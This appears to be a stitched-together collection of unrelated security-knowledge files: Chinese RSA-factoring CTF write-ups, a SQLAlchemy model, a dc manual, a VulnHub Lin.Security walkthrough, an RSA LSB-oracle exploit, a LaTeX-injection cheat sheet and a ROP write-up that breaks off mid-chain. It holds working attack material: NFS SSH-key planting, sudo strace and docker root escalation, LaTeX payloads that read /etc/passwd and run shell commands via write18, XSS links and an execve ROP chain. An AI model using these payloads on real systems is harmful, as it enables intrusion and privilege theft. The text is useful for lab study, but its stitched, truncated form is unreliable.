11807485231629132025602991324007150366908229752508016230400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001 12684117323636134264468162714319298445454220244413621344524758865071052169170753552224766744798369054498758364258656141800253652826603727552918575175830897 Z309 = P155 x P155 = 11807485231629132025602991324007150366908229752508016230400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001 x 12684117323636134264468162714319298445454220244413621344524758865071052169170753552224766744798369054498758364258656141800253652826603727552918575175830897 ``` 可以发现当使用 Williams's *p* + 1 算法时,就直接分解出来了。按道理这个因子是 p-1 似乎更光滑,但是却并不能使用 Pollard's p − 1 算法分解,这里进行进一步的测试 ```shell ➜ _s.pcap.extracted git:(master) python -m primefac -vs 1180748523162913202560299132400715036690822975250801623040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002 1180748523162913202560299132400715036690822975250801623040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002: 2 7 43 503 761429 5121103123294685745276806480148867612214394022184063853387799606010231770631857868979139305712805242051823263337587909550709296150544706624823 Z154 = P1 x P1 x P2 x P3 x P6 x P142 = 2 x 7 x 43 x 503 x 761429 x 5121103123294685745276806480148867612214394022184063853387799606010231770631857868979139305712805242051823263337587909550709296150544706624823 ➜ _s.pcap.extracted git:(master) python -m primefac -vs 1180748523162913202560299132400715036690822975250801623040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 1180748523162913202560299132400715036690822975250801623040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000: 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 Z154 = P1^185 x P1^62 x P1^97 = 2^185 x 3^62 x 5^97 ``` 可以看出,对于 p-1 确实有很多小因子,但是个数太多,这就会使得进行枚举的时候出现指数爆炸的情况,因此没有分解出来。 进而根据分解出来的数构造私钥 ```python from Crypto.PublicKey import RSA import gmpy2 def main(): n = 149767527975084886970446073530848114556615616489502613024958495602726912268566044330103850191720149622479290535294679429142532379851252608925587476670908668848275349192719279981470382501117310509432417895412013324758865071052169170753552224766744798369054498758364258656141800253652826603727552918575175830897L p = 11807485231629132025602991324007150366908229752508016230400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001L q = 12684117323636134264468162714319298445454220244413621344524758865071052169170753552224766744798369054498758364258656141800253652826603727552918575175830897L e = 65537L priv = RSA.construct((n, e, long(gmpy2.invert(e, (p - 1) * (q - 1))))) open('private.pem', 'w').write(priv.exportKey('PEM')) main() ``` 最后,将私钥导入到 wireshark 中即可得到明文(Edit -> Preferences -> Protocols -> SSL -> RSA Key List)。 ```html <html> <head><title>Very smooth</title></head> <body> <h1> Answer: One of these primes is very smooth. </h1> </body> </html> ``` ### 扩展 关于更多的一些分解模数 N 的方法可以参考 https://en.wikipedia.org/wiki/Integer_factorization。 ## 模不互素 ### 攻击原理 当存在两个公钥的 N 不互素时,我们显然可以直接对这两个数求最大公因数,然后直接获得 p,q,进而获得相应的私钥。 ### SCTF RSA2 这里我们以 SCTF rsa2 为例进行介绍。直接打开 pcap 包,发现有一堆的消息,包含 N 和 e,然后试了试不同的 N 是否互素,我试了前两个 ```python import gmpy2 n1 = 20823369114556260762913588844471869725762985812215987993867783630051420241057912385055482788016327978468318067078233844052599750813155644341123314882762057524098732961382833215291266591824632392867716174967906544356144072051132659339140155889569810885013851467056048003672165059640408394953573072431523556848077958005971533618912219793914524077919058591586451716113637770245067687598931071827344740936982776112986104051191922613616045102859044234789636058568396611030966639561922036712001911238552391625658741659644888069244729729297927279384318252191421446283531524990762609975988147922688946591302181753813360518031 n2 = 19083821613736429958432024980074405375408953269276839696319265596855426189256865650651460460079819368923576109723079906759410116999053050999183058013281152153221170931725172009360565530214701693693990313074253430870625982998637645030077199119183041314493288940590060575521928665131467548955951797198132001987298869492894105525970519287000775477095816742582753228905458466705932162641076343490086247969277673809512472546919489077884464190676638450684714880196854445469562733561723325588433285405495368807600668761929378526978417102735864613562148766250350460118131749533517869691858933617013731291337496943174343464943 print gmpy2.gcd(n1, n2) ``` 结果发现竟然不互素。 ```shell ➜ scaf-rsa2 git:(master) ✗ python exp.py 122281872221091773923842091258531471948886120336284482555605167683829690073110898673260712865021244633908982705290201598907538975692920305239961645109897081011524485706755794882283892011824006117276162119331970728229108731696164377808170099285659797066904706924125871571157672409051718751812724929680249712137 ``` 那么我们就可以直接来解密了,这里我们利用第一对公钥密码。代码如下 ```python from Crypto.PublicKey import RSA from Crypto.Cipher import PKCS1_v1_5, PKCS1_OAEP import gmpy2 from base64 import b64decode n1 = 20823369114556260762913588844471869725762985812215987993867783630051420241057912385055482788016327978468318067078233844052599750813155644341123314882762057524098732961382833215291266591824632392867716174967906544356144072051132659339140155889569810885013851467056048003672165059640408394953573072431523556848077958005971533618912219793914524077919058591586451716113637770245067687598931071827344740936982776112986104051191922613616045102859044234789636058568396611030966639561922036712001911238552391625658741659644888069244729729297927279384318252191421446283531524990762609975988147922688946591302181753813360518031 n2 = 19083821613736429958432024980074405375408953269276839696319265596855426189256865650651460460079819368923576109723079906759410116999053050999183058013281152153221170931725172009360565530214701693693990313074253430870625982998637645030077199119183041314493288940590060575521928665131467548955951797198132001987298869492894105525970519287000775477095816742582753228905458466705932162641076343490086247969277673809512472546919489077884464190676638450684714880196854445469562733561723325588433285405495368807600668761929378526978417102735864613562148766250350460118131749533517869691858933617013731291337496943174343464943 p1 = gmpy2.gcd(n1, n2) q1 = n1 / p1 e = 65537 phin = (p1 - 1) * (q1 - 1) d = gmpy2.invert(e, phin) cipher = 0x68d5702b70d18238f9d4a3ac355b2a8934328250efd4efda39a4d750d80818e6fe228ba3af471b27cc529a4b0bef70a2598b80dd251b15952e6a6849d366633ed7bb716ed63c6febd4cd0621b0c4ebfe5235de03d4ee016448de1afbbe61144845b580eed8be8127a8d92b37f9ef670b3cdd5af613c76f58ca1a9f6f03f1bc11addba30b61bb191efe0015e971b8f78375faa257a60b355050f6435d94b49eab07075f40cb20bb8723d02f5998d5538e8dafc80cc58643c91f6c0868a7a7bf3bf6a9b4b6e79e0a80e89d430f0c049e1db4883c50db066a709b89d74038c34764aac286c36907b392bc299ab8288f9d7e372868954a92cdbf634678f7294096c7 plain = gmpy2.powmod(cipher, d, n1) plain = hex(plain)[2:] if len(plain) % 2 != 0: plain = '0' + plain print plain.decode('hex') ``` 最后解密如下 ```shell ➜ scaf-rsa2 git:(master) ✗ python exp.py sH1R3_PRlME_1N_rsA_iS_4ulnEra5le ``` 解压压缩包即可。 ## 共模攻击 ### 攻击条件 当两个用户使用相同的模数 N、不同的私钥时,加密同一明文消息时即存在共模攻击。 ### 攻击原理 设两个用户的公钥分别为 $e_1$ 和 $e_2$,且两者互质。明文消息为 $m$,密文分别为: $$ c_1 = m^{e_1}\bmod N \\ c_2 = m^{e_2}\bmod N $$ 当攻击者截获 $c_1$ 和 $c_2$ 后,就可以恢复出明文。用扩展欧几里得算法求出 $re_1+se_2=1\bmod n$ 的两个整数 $r$ 和 $s$,由此可得: $$ \begin{align*} c_{1}^{r}c_{2}^{s} &\equiv m^{re_1}m^{se_2}\bmod n\\ &\equiv m^{(re_1+se_2)} \bmod n\\ &\equiv m\bmod n \end{align*} $$ ### XMan 一期夏令营课堂练习 题目描述: ``` {6266565720726907265997241358331585417095726146341989755538017122981360742813498401533594757088796536341941659691259323065631249,773} {6266565720726907265997241358331585417095726146341989755538017122981360742813498401533594757088796536341941659691259323065631249,839} message1=3453520592723443935451151545245025864232388871721682326408915024349804062041976702364728660682912396903968193981131553111537349 message2=5672818026816293344070119332536629619457163570036305296869053532293105379690793386019065754465292867769521736414170803238309535 ``` > 题目来源:XMan 一期夏令营课堂练习 可以看出两个公钥的 N 是一样的,并且两者的 e 互素。写一个脚本跑一下: ```python import gmpy2 n = 6266565720726907265997241358331585417095726146341989755538017122981360742813498401533594757088796536341941659691259323065631249 e1 = 773 e2 = 839 message1 = 3453520592723443935451151545245025864232388871721682326408915024349804062041976702364728660682912396903968193981131553111537349 message2 = 5672818026816293344070119332536629619457163570036305296869053532293105379690793386019065754465292867769521736414170803238309535 # s & t gcd, s, t = gmpy2.gcdext(e1, e2) if s < 0: s = -s message1 = gmpy2.invert(message1, n) if t < 0: t = -t message2 = gmpy2.invert(message2, n) plain = gmpy2.powmod(message1, s, n) * gmpy2.powmod(message2, t, n) % n print plain ``` 得到 ```shell ➜ Xman-1-class-exercise git:(master) ✗ python exp.py 1021089710312311910410111011910111610410511010710511610511511211111511510598108101125 ``` 这时候需要考虑当时明文是如何转化为这个数字了,一般来说是 16 进制转换,ASCII 字符转换,或者 Base64 解密。这个应该是 ASCII 字符转换,进而我们使用如下代码得到 flag ```python i = 0 flag = "" plain = str(plain) while i < len(plain): if plain[i] == '1': flag += chr(int(plain[i:i + 3])) i += 3 else: flag += chr(int(plain[i:i + 2])) i += 2 print flag ``` 这里之所以使用 1 来判断是否为三位长度,是因为 flag 一般都是明文字符,而 1 开头的长度为 1 或者 2 的数字,一般都是不可见字符。 flag ```shell ➜ Xman-1-class-exercise git:(master) ✗ python exp.py flag{whenwethinkitispossible} ``` ## 题目 - Jarvis OJ very hard RSA
sec-knowleage
from sqlalchemy import create_engine from sqlalchemy.ext.declarative import declarative_base from sqlalchemy.orm import relationship, scoped_session, sessionmaker from sqlalchemy import Column, DateTime, ForeignKey, Boolean, Integer, Text, func, String engine = create_engine('sqlite:///level18.db', convert_unicode=True) db_session = scoped_session(sessionmaker(autocommit=False, autoflush=False, bind=engine)) Base = declarative_base() Base.query = db_session.query_property() class User(Base): __tablename__ = 'users' id = Column(Integer, primary_key=True) username = Column(String(255)) password = Column(String(255)) bugs = relationship('Bug', primaryjoin='Bug.reporter_id==User.id') class Bug(Base): __tablename__ = 'bugs' id = Column(Integer, primary_key=True) reporter_id = Column(Integer, ForeignKey('users.id')) reporter = relationship(User, primaryjoin=reporter_id == User.id) text = Column(Text(65536)) private = Column(Boolean()) attachments = relationship('Attachment', primaryjoin='Attachment.bug_id==Bug.id') class Attachment(Base): __tablename__ = 'attachments' id = Column(Integer, primary_key=True) bug_id = Column(Integer, ForeignKey('bugs.id')) bug = relationship(Bug, primaryjoin=bug_id == Bug.id) filename = Column(String(255))
sec-knowleage
dc === 任意精度计算器 ## 说明 dc 是一款逆波兰表达式计算器,支持无限制精度的算术运算。它还允许您定义和调用宏。通常,dc从标准输入读取,也可以通过参数传入文件来求值。 ## 语法 ```shell dc [选项] [文件...] ``` ### 选项 ```shell -e, --expression=EXPR # 评估表达式 -f, --file=FILE # 评估文件内容 -h, --help # 显示此帮助并退出 -V, --version # 输出版本信息并退出 ``` ```shell p 打印堆栈顶部的值并以换行符结束语句。 n 打印堆栈顶部的值并以空语句结束行。 f 打印整个堆栈,不做任何更改。 P 从栈顶弹出值。 c 清除堆栈。 d 复制顶部值并将其推入主堆栈。 r 反转堆栈中顶部两个元素的顺序。 Z 从堆栈中弹出值,计算其中的位数并压入该数字。 X 从堆栈中弹出值,计算其中的小数位数并压入该数字。 z 将堆栈长度推入堆栈。 i 从堆栈中弹出值并将其用作输入基数。 o 从堆栈中弹出值并将其用作输出基数。 k 从堆栈中弹出值并使用它来设置精度。 I 将输入基数的值推入堆栈。 O 将输出基数的值压入堆栈 K 将精度值压入堆栈。 ``` ## 示例 下面是 `dc` 命令在命令行完成的计算 `10 * 10` 得出结果 `100`,并推出的过程 ```shell $ dc 10 # 1. 输入数字10 10 # 2. 输入数字10 * # 3. 输入运算类型*表示乘 p # 4. 输入p得到计算结果 100 q # 5. 输入 q 退出 dc ``` 示例显示在命令行结果 `509` ```bash $ dc --expression="50 10 * 9 + p" 509 ``` ## 支持的运算 `+` 从堆栈中弹出两个值,将它们相加,然后压栈结果。 `-` 弹出两个值,从弹出的第二个值中减去弹出的第一个值,并压栈结果。 `*` 弹出两个值,将它们相乘,然后压栈结果。结果中分数位数取决于当前精度值和两个参数中的分数位数。 `/` 弹出两个值,将弹出的第二个值与弹出的第一个值相除,然后推送结果。分数位数由精度值指定。 `%` 弹出两个值,计算/命令将执行的除法的剩余部分,并推送该值。计算的值与序列 `Sd dld/Ld*- `计算的值相同。 `~` 弹出两个值,将弹出的第二个值与弹出的第一个值相除。首先推送商,然后推送余数。除法中使用的小数位数由精度值指定。 (序列 SdSn lnld/lnld% 也可以完成此功能,但错误检查略有不同。) `^` 使用弹出的第一个值作为指数,第二个值作为基数,弹出两个值并进行幂运算。忽略指数的分数部分。 `|` 弹出三个值并计算模幂。 弹出的第一个值用作约简模数; 这个值必须是一个非零数字,并且应该是一个整数。 弹出的第二个用作指数; 该值必须是非负数,并且该指数的任何小数部分都将被忽略。 弹出的第三个值是取幂的基数,它应该是一个整数。 对于小整数,这类似于序列 Sm^Lm%,但与 ^ 不同的是,此命令适用于任意大的指数。 `v` 弹出一个值,计算其平方根,然后压栈它。精度值的最大值和参数的精度用于确定结果中的小数位数。
sec-knowleage
# Lin.Security 下载地址:https://download.vulnhub.com/linsecurity/lin.security_v1.0.ova > 使用VB启动,VMware获取不到IP地址 ## 实战演练 > 账号密码:bob/secret 靶场的IP地址:`192.168.32.6` ![image-20220610135535460](../../.gitbook/assets/image-20220610135535460-1675839868988823.png) 扫描对外端口 ``` ┌──(root㉿kali)-[~/Desktop] └─# nmap -sV -p1-65535 192.168.32.6 Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-11 21:07 EDT Nmap scan report for 192.168.32.6 Host is up (0.00023s latency). Not shown: 65528 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) 111/tcp open rpcbind 2-4 (RPC #100000) 2049/tcp open nfs_acl 3 (RPC #100227) 36323/tcp open mountd 1-3 (RPC #100005) 41355/tcp open nlockmgr 1-4 (RPC #100021) 48107/tcp open mountd 1-3 (RPC #100005) 48441/tcp open mountd 1-3 (RPC #100005) MAC Address: 08:00:27:D8:9F:D6 (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.85 seconds ``` 我们看到`rpcbind`运行 和一些正在运行的端口`mountd`。我们应该做的第一件事是枚举所有可用的网络共享: ``` ┌──(root㉿kali)-[~/Desktop] └─# showmount -e 192.168.32.6 Export list for 192.168.32.6: /home/peter * ``` 挂载共享目录 ``` ┌──(root㉿kali)-[/tmp] └─# mkdir peter ┌──(root㉿kali)-[/tmp] └─# mount -t nfs 192.168.32.6:/home/peter ./peter -o nolock ``` 查看文件夹内容 ``` ┌──(root㉿kali)-[/tmp/peter] └─# ls -al total 36 drwxr-xr-x 6 cvechecker 1005 4096 Jun 11 21:15 . drwxrwxrwt 13 root root 4096 Jun 11 21:11 .. -rw-r--r-- 1 cvechecker 1005 220 Jul 9 2018 .bash_logout -rw-r--r-- 1 cvechecker 1005 3771 Jul 9 2018 .bashrc drwx------ 2 cvechecker 1005 4096 Jul 10 2018 .cache -rw-rw-r-- 1 cvechecker 1005 0 Jul 10 2018 .cloud-locale-test.skip drwx------ 3 cvechecker 1005 4096 Jul 10 2018 .gnupg drwxrwxr-x 3 cvechecker 1005 4096 Jul 10 2018 .local -rw-r--r-- 1 cvechecker 1005 807 Jul 9 2018 .profile drwxr-xr-x 2 cvechecker cvechecker 4096 Jun 11 21:15 .ssh ┌──(root㉿kali)-[/tmp/peter] └─# ls -al total 32 drwxr-xr-x 5 1001 1005 4096 Jul 10 2018 . drwxrwxrwt 13 root root 4096 Jun 11 21:11 .. -rw-r--r-- 1 1001 1005 220 Jul 9 2018 .bash_logout -rw-r--r-- 1 1001 1005 3771 Jul 9 2018 .bashrc drwx------ 2 1001 1005 4096 Jul 10 2018 .cache -rw-rw-r-- 1 1001 1005 0 Jul 10 2018 .cloud-locale-test.skip drwx------ 3 1001 1005 4096 Jul 10 2018 .gnupg drwxrwxr-x 3 1001 1005 4096 Jul 10 2018 .local -rw-r--r-- 1 1001 1005 807 Jul 9 2018 .profile ``` 没有权限进行创建 ``` ┌──(root㉿kali)-[/tmp/peter] └─# touch .ssh touch: cannot touch '.ssh': Permission denied ``` 创建`cvechecker`用户 ``` ┌──(root㉿kali)-[/tmp/peter] └─# useradd cvechecker ┌──(root㉿kali)-[/tmp/peter] └─# sudo -u cvechecker bash cvechecker@kali:/tmp/peter$ mkdir .ssh ``` 生成公钥 ``` ┌──(root㉿kali)-[/tmp] └─# ssh-keygen -t rsa -C "xxxxx@xxxxx.com" Generating public/private rsa key pair. Enter file in which to save the key (/root/.ssh/id_rsa): /tmp/id_ras Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /tmp/id_ras Your public key has been saved in /tmp/id_ras.pub The key fingerprint is: SHA256:ZODZhucn4oEgnrT/T5bVMcpgwwlAlcl4E10VRJ2ohRU xxxxx@xxxxx.com The key's randomart image is: +---[RSA 3072]----+ | .o=+* ..*E= . | | . Bo*.. o o | |... . =** oo | |o.o. ..*+.o o | | + . o S+.. | | . . ooo | | . .+ | | . o | | ... | +----[SHA256]-----+ ``` 将公钥复制到共享文件夹里面 ``` cvechecker@kali:/tmp/peter$ cp /tmp/id_ras.pub /tmp/peter/.ssh/authorized_keys ``` 使用私钥进行登录 ``` ┌──(root㉿kali)-[/tmp] └─# ssh -i id_ras peter@192.168.32.6 ██╗ ██╗███╗ ██╗ ███████╗███████╗ ██████╗██╗ ██╗██████╗ ██╗████████╗██╗ ██╗ ██║ ██║████╗ ██║ ██╔════╝██╔════╝██╔════╝██║ ██║██╔══██╗██║╚══██╔══╝╚██╗ ██╔╝ ██║ ██║██╔██╗ ██║ ███████╗█████╗ ██║ ██║ ██║██████╔╝██║ ██║ ╚████╔╝ ██║ ██║██║╚██╗██║ ╚════██║██╔══╝ ██║ ██║ ██║██╔══██╗██║ ██║ ╚██╔╝ ███████╗██║██║ ╚████║██╗███████║███████╗╚██████╗╚██████╔╝██║ ██║██║ ██║ ██║ ╚══════╝╚═╝╚═╝ ╚═══╝╚═╝╚══════╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ Welcome to lin.security | https://in.security | version 1.0 peter@linsecurity:~$ id uid=1001(peter) gid=1005(peter) groups=1005(peter),999(docker) ``` ## 权限提升 ### strace提权 查看`sudo`可执行列表 ``` peter@linsecurity:~$ sudo -l Matching Defaults entries for peter on linsecurity: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User peter may run the following commands on linsecurity: (ALL) NOPASSWD: /usr/bin/strace ``` 使用`strace`进行提权 ``` peter@linsecurity:~$ sudo strace -o /dev/null sh # id uid=0(root) gid=0(root) groups=0(root) # whoami root ``` ### docker提权 因为peter账号有**docker**权限 ``` peter@linsecurity:~$ docker -v Docker version 18.03.1-ce, build 9ee9f40 ``` 所以可以利用docker进行提权 ``` docker run -v /:/hostOS -it --rm chrisfosterelli/rootplease ``` ![image-20230208150438554](../../.gitbook/assets/image-20230208150438554.png)
sec-knowleage
import gmpy2 import itertools import re from Crypto.Util.number import getPrime, bytes_to_long, long_to_bytes from crypto_commons.netcat.netcat_commons import send, receive_until_match, nc from crypto_commons.oracle.lsb_oracle import lsb_oracle_from_bits from crypto_commons.rsa.rsa_commons import modinv def command(s, data, command): send(s, command) res = receive_until_match(s, "input: ") send(s, data.encode("hex")) res = receive_until_match(s, ".*\n") return re.findall("(.*)\s+", res)[0] def enc(s, data): return command(s, data, 'A') def dec(s, data): return command(s, data, 'B') def recover_flag(enc, dec, flag, n): flag = int(flag, 16) x = flag bits = [] lastchar = int(dec(long_to_bytes(flag)), 16) prev = lastchar multiplier = int(enc(long_to_bytes(2 ** 8)), 16) for i in range(128): x = x * multiplier expected_value = int(dec(long_to_bytes(x)), 16) real_x = prev for configuration in itertools.product([0, 1], repeat=8): res = real_x % 256 for bit in configuration: res = res * 2 if bit == 1: res = res - n res = res % 256 if res == expected_value: print(configuration) bits.extend(configuration) break prev = expected_value return long_to_bytes(lsb_oracle_from_bits(n, iter(bits)))[:-1] + chr(lastchar) def recover_pubkey(enc): two = int(enc('\x02'), 16) three = int(enc('\x03'), 16) power_two = int(enc('\x04'), 16) power_three = int(enc('\x09'), 16) n = gmpy2.gcd(two ** 2 - power_two, three ** 2 - power_three) while n % 2 == 0: n = n / 2 while n % 3 == 0: n = n / 3 return n def main(): url = '18.179.251.168' # url = 'localhost' port = 21700 s = nc(url, port) data = receive_until_match(s, "cmd:") flag = re.findall('Here is the flag!\s*(.*)\s*cmd:', data)[0] print(flag) encryptor = lambda data: enc(s, data) decryptor = lambda data: dec(s, data) n = recover_pubkey(encryptor) print(n) print(recover_flag(encryptor, decryptor, flag, n)) main() def sanity_recover_pubkey(): bitsize = 512 p = getPrime(bitsize / 2) q = getPrime(bitsize / 2) e = 2 ** 20 - 1 n = p * q phi = (p - 1) * (q - 1) d = modinv(e, phi) print(e, n) def encryptor(data): return long_to_bytes(pow(bytes_to_long(data), e, n)).encode("hex") recovered_n = recover_pubkey(lambda data: encryptor(data)) print(recovered_n == n) # sanity_recover_pubkey() def sanity_recover_flag(): bitsize = 512 p = getPrime(bitsize / 2) q = getPrime(bitsize / 2) e = 65537 n = p * q phi = (p - 1) * (q - 1) d = modinv(e, phi) flag = long_to_bytes(pow(bytes_to_long("alamakota"), e, n)).encode("hex") def encryptor(data): return long_to_bytes(pow(bytes_to_long(data), e, n)).encode("hex") def decryptor(data): return long_to_bytes(pow(bytes_to_long(data), d, n)).encode("hex")[-2:] dec = lambda data: decryptor(data) enc = lambda data: encryptor(data) print(recover_flag(enc, dec, flag, n)) # sanity_recover_flag()
sec-knowleage
# LaTex Injection ## Read file Read file and interpret the LaTeX code in it: ```tex \input{/etc/passwd} \include{somefile} # load .tex file (somefile.tex) ``` Read single lined file: ```tex \newread\file \openin\file=/etc/issue \read\file to\line \text{\line} \closein\file ``` Read multiple lined file: ```tex \newread\file \openin\file=/etc/passwd \loop\unless\ifeof\file \read\file to\fileline \text{\fileline} \repeat \closein\file ``` Read text file, **without** interpreting the content, it will only paste raw file content: ```tex \usepackage{verbatim} \verbatiminput{/etc/passwd} ``` If injection point is past document header (`\usepackage` cannot be used), some control characters can be deactivated in order to use `\input` on file containing `$`, `#`, `_`, `&`, null bytes, ... (eg. perl scripts). ```tex \catcode `\$=12 \catcode `\#=12 \catcode `\_=12 \catcode `\&=12 \input{path_to_script.pl} ``` ## Write file Write single lined file: ```tex \newwrite\outfile \openout\outfile=cmd.tex \write\outfile{Hello-world} \write\outfile{Line 2} \write\outfile{I like trains} \closeout\outfile ``` ## Command execution The output of the command will be redirected to stdout, therefore you need to use a temp file to get it. ```tex \immediate\write18{id > output} \input{output} ``` If you get any LaTex error, consider using base64 to get the result without bad characters (or use `\verbatiminput`): ```tex \immediate\write18{env | base64 > test.tex} \input{text.tex} ``` ```tex \input|ls|base64 \input{|"/bin/hostname"} ``` ## Cross Site Scripting From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130) ```tex \url{javascript:alert(1)} \href{javascript:alert(1)}{placeholder} ``` Live example at `http://payontriage.com/xss.php?xss=$\href{javascript:alert(1)}{Frogs%20find%20bugs}$` ## References * [Hacking with LaTeX - Sebastian Neef - 0day.work](https://0day.work/hacking-with-latex/) * [Latex to RCE, Private Bug Bounty Program - Yasho](https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a) * [Pwning coworkers thanks to LaTeX](http://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)
sec-knowleage
# can-you-gets-me Binary Exploitation, 650 points ## Description: > Can you exploit the following program to get a flag? You may need to think return-oriented if you want to program your way to the flag. ```c #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #define BUFSIZE 16 void vuln() { char buf[16]; printf("GIVE ME YOUR NAME!\n"); return gets(buf); } int main(int argc, char **argv){ setvbuf(stdout, NULL, _IONBF, 0); // Set the gid to the effective gid // this prevents /bin/sh from dropping the privileges gid_t gid = getegid(); setresgid(gid, gid, gid); vuln(); } ``` ## Solution: The buffer overflow is pretty obvious, and the question points us to a ROP attack. [RopGadget](https://github.com/JonathanSalwan/ROPgadget) can be very useful in these situations: ```console root@kali:/media/sf_CTFs/pico/can-you-gets-me# ROPgadget --binary ./gets --ropchain > rop_output.txt root@kali:/media/sf_CTFs/pico/can-you-gets-me# tail -n 100 rop_output.txt 0x080b5a91 : xor eax, eax ; pop edi ; pop ebp ; ret 0x080681c0 : xor eax, eax ; pop edi ; ret 0x08091e77 : xor eax, eax ; pop esi ; pop edi ; pop ebp ; ret 0x080528a7 : xor eax, eax ; pop esi ; pop edi ; ret 0x08049303 : xor eax, eax ; ret 0x080b7e66 : xor ebp, dword ptr [edx + 0x1a] ; push 1 ; mov eax, dword ptr [esp + 0x28] ; call eax 0x080b7e20 : xor ebp, dword ptr [edx + 0xa] ; push 1 ; call eax 0x080b7dfa : xor ebp, dword ptr [edx + 0xa] ; push 1 ; mov eax, dword ptr [esp + 0x28] ; call eax 0x0804f0e0 : xor ebx, ebx ; jmp 0x804f0aa 0x0804e193 : xor ebx, ebx ; mov eax, ebx ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret 0x080b767f : xor ebx, ecx ; mov eax, esi ; jmp 0x80b7068 0x08049633 : xor ecx, ecx ; pop ebx ; mov eax, ecx ; pop esi ; pop edi ; pop ebp ; ret 0x080563a9 : xor edi, dword ptr [ecx] ; ret 0x080a9479 : xor edi, ebx ; inc dword ptr [ebx + 0x7d8010c4] ; ret 0x0804db5a : xor edi, edi ; mov eax, dword ptr ss:[esp + 0x10] ; call eax 0x0804e253 : xor edx, dword ptr [0x18] ; call edx 0x0804e252 : xor edx, dword ptr gs:[0x18] ; call edx 0x080709b4 : xor edx, edx ; cmp ebx, eax ; setne dl ; jmp 0x807099f 0x08080efb : xor edx, edx ; div esi ; add eax, ebx ; pop ebx ; pop esi ; ret 0x0808aea0 : xor edx, edx ; div esi ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret 0x08071ba1 : xor edx, edx ; mov eax, edx ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret 0xc 0x080847e5 : xor esi, dword ptr [ecx] ; jmp 0x8083739 0x080b9ff3 : xor esi, esi ; pop ebx ; mov eax, esi ; pop esi ; pop edi ; pop ebp ; ret 0x0808e10c : xor esi, esi ; ret 0xf01 Unique gadgets found: 11741 ROP chain generation =========================================================== - Step 1 -- Write-what-where gadgets [+] Gadget found: 0x8051035 mov dword ptr [esi], edi ; pop ebx ; pop esi ; pop edi ; ret [+] Gadget found: 0x8048433 pop esi ; ret [+] Gadget found: 0x8048480 pop edi ; ret [-] Can't find the 'xor edi, edi' gadget. Try with another 'mov [r], r' [+] Gadget found: 0x80549db mov dword ptr [edx], eax ; ret [+] Gadget found: 0x806f02a pop edx ; ret [+] Gadget found: 0x80b81c6 pop eax ; ret [+] Gadget found: 0x8049303 xor eax, eax ; ret - Step 2 -- Init syscall number gadgets [+] Gadget found: 0x8049303 xor eax, eax ; ret [+] Gadget found: 0x807a86f inc eax ; ret - Step 3 -- Init syscall arguments gadgets [+] Gadget found: 0x80481c9 pop ebx ; ret [+] Gadget found: 0x80de955 pop ecx ; ret [+] Gadget found: 0x806f02a pop edx ; ret - Step 4 -- Syscall gadget [+] Gadget found: 0x806cc25 int 0x80 - Step 5 -- Build the ROP chain #!/usr/bin/env python2 # execve generated by ROPgadget from struct import pack # Padding goes here p = '' p += pack('<I', 0x0806f02a) # pop edx ; ret p += pack('<I', 0x080ea060) # @ .data p += pack('<I', 0x080b81c6) # pop eax ; ret p += '/bin' p += pack('<I', 0x080549db) # mov dword ptr [edx], eax ; ret p += pack('<I', 0x0806f02a) # pop edx ; ret p += pack('<I', 0x080ea064) # @ .data + 4 p += pack('<I', 0x080b81c6) # pop eax ; ret p += '//sh' p += pack('<I', 0x080549db) # mov dword ptr [edx], eax ; ret p += pack('<I', 0x0806f02a) # pop edx ; ret p += pack('<I', 0x080ea068) # @ .data + 8 p += pack('<I', 0x08049303) # xor eax, eax ; ret p += pack('<I', 0x080549db) # mov dword ptr [edx], eax ; ret p += pack('<I', 0x080481c9) # pop ebx ; ret p += pack('<I', 0x080ea060) # @ .data p += pack('<I', 0x080de955) # pop ecx ; ret p += pack('<I', 0x080ea068) 